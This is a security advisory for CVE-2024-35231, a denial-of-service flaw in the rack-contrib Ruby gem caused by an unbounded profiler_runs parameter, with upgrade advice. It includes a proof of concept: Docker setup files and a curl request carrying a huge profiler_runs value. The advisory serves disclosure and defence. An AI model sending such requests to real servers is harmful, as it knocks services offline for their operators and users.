Allocation of Resources Without Limits or Throttling Affecting rack-contrib package, versions <2.5.0
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-RUBY-RACKCONTRIB-7148535
- published 28 May 2024
- disclosed 27 May 2024
- credit Sim4n6
Introduced: 27 May 2024
CVE-2024-35231 Open this link in a new tabHow to fix?
Upgrade rack-contrib
to version 2.5.0 or higher.
Overview
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to the unconstrained value of the incoming profiler_runs
parameter. An attacker can cause the server to allocate excessive resources, leading to a denial of service by sending crafted requests with large profiler_runs
values.
PoC
config.ru
file:
require 'rack'
require 'rack/contrib'
use Rack::Profiler # if ENV['RACK_ENV'] == 'development'
Define a Rack application
app = lambda do |env|
Your application logic goes here
[200, {}, ["Hello World"]]
end
Run the Rack application
run app
A Dockerfile:
# Use the official Ruby image as a base
FROM ruby:latest
Set the working directory inside the container
WORKDIR /app
Copy the custom config.ru file into the container
COPY config.ru .
COPY Gemfile .
Install rack and the gems needed to run the app
RUN bundle install
Expose the port that rackup will listen on
EXPOSE 9292
Run rackup when the container starts
ENTRYPOINT ["rackup","--host","0.0.0.0","--port","9292"]
Health check
HEALTHCHECK --interval=3s --timeout=10s --start-period=2s --retries=3 CMD curl --fail http://localhost:9292/ || exit 1
A Gemfile:
source 'https://rubygems.org'
gem 'rack', '> 2.0'
gem 'rack-contrib', '> 2.4'
gem 'rackup'
gem 'ruby-prof'
A Docker compose:
services:
app:
build:
context: .
ports:
- "9292:9292"
To run the PoC:
docker compose up --build
To exploit DoS:
curl "http://127.0.0.1:9292/?profiler_runs=9999999999&profile=process_time"